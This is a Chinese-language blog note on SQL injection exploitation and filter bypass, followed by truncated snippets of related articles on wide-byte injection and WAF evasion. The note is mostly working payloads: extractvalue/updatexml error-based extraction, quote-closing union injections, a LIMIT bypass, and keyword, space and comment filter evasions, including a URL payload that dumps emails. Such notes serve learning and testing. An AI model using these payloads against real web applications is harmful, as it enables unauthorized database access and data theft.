SQL注入筆記05 利用和繞過

2021-08-28 23:35:20 字數 1080 閱讀 5093

2、利用報錯資訊:

1.extractvalue()

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

2.updatexml()

select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

3、利用閉合繞過'、"、)等,不使用注釋符,保持sql語句完整:

1、get:select * from user where id>"$id" order by id desc limit 0,1;

?id=1" union select 1,2,3 where "1"="1 //and "1"="1,and "1也行

2、post:select * from user where username="$u" and password="$p";

username:可使用盲注,admin and length(user())>1 and "1"="1 // and優先順序比or高

password:因為是最後乙個引數,所以方法多多,可union、and、or等

4、繞過limit 0,1:

?id=0 union select user(),version(),3 union select 1,2,3

id=0:為空資料,select 1,2,3:用以繞過limit 0,1,看引數情況select 1,2,3可以為select 1,2,'3、"3、('3、("3等

5、繞過or和and遮蔽:

使用雙寫oorr、aanndd或者&&、||(url上使用需轉碼%26%26、%7c%7c)

6、繞過空格和注釋遮蔽

url裡使用%a0代替空格,使用閉合代替注釋

?id=0%27%a0union%a0select%a01,group_concat(email_id),3%a0from%a0emails%a0union%a0select(1),2,'3

7、繞過union和select遮蔽

黑名單:union、select等等

sql繞過注入

sql繞過注入我推薦在 這個官網上學習 下面是我在這個官網學習的乙個過程 order by 猜數字 union select 1,2,3,4,5,6,7,8,9,10 form admin 在這裡會報錯 因為需要繞過才能注入。因此需要在 上載入外掛程式 cookie 或者 modheader 都可以...

mysql注入轉義繞過 SQL注入防禦繞過

一 寬位元組注入 1 什麼是寬位元組 gb2312 gbk gb18030 big5等這些都是常說的寬位元組,實際為兩位元組 2 寬位元組注入原理 防禦 將 轉換為 繞過 將 消滅 mysql在使用gbk編碼的時候,會認為兩個字元為乙個漢字 編碼為 5c 編碼為 27 df 5c mysql會認為是...

mysql手工注入繞過 sql注入繞過WAF

這幾天的ctf題中有好幾道題都是sql注入的,但都存在waf需要繞過,於是整理了一些常見的繞過waf注入的方法。在現實sql注入中我們也常常碰到waf,那麼掌握常見的繞過很有必要。0x01 手工注入繞過 1 大小寫混合例如 union select 1,2,3,4 只適用於針對大小寫關鍵字的匹配 2...